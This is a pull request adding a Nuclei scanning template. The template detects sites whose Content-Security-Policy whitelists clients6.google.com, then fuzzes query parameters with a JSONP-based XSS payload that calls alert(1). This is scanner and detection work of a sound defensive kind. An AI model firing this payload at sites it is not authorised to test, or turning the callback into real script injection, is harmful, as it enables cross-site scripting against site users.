### PR TITLE
feat(templates): Add Nuclei template for clients6 CSP bypass

### DIFF
--- a/dast/vulnerabilities/xss/csp-bypass/clients6-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/clients6-csp-bypass.yaml
@@ -1,0 +1,54 @@
+id: clients6-csp-bypass
+
+info:
+  name: Content-Security-Policy Bypass - clients6
+  author: Jaenact
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,clients6
+
+flow: http(1) && headless(1)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Security-Policy"
+          - "clients6.google.com"
+        condition: and
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+
+      - action: waitdialog
+        name: clients6_csp_xss
+        args:
+          max-duration: 5s
+
+    payloads:
+      injection:
+        - '<script src="https://clients6.google.com/drive/v2beta/files?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "clients6_csp_xss == true"


### PR DESCRIPTION
**This pull request introduces a new Nuclei template, `clients6-csp-bypass.yaml`, to detect a Content-Security-Policy (CSP) bypass vulnerability.**

The template identifies misconfigurations where a web application's CSP whitelists `clients6.google.com`. This domain exposes a JSONP endpoint that can be exploited to execute arbitrary JavaScript if the target is vulnerable to HTML injection, leading to Cross-Site Scripting (XSS).

## References

- This template is based on the research and data provided by the [renniepak/CSPBypass](https://github.com/renniepak/CSPBypass) repository.
- The specific endpoint was added in the recent commit [1e4a8f1](https://github.com/renniepak/CSPBypass/commit/1e4a8f1a194b9cd733c4885ff7c59ebc0a09821f).
<img width="2206" height="462" alt="image" src="https://github.com/user-attachments/assets/458fc903-1d14-4596-9d56-613d89a08283" />


## Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)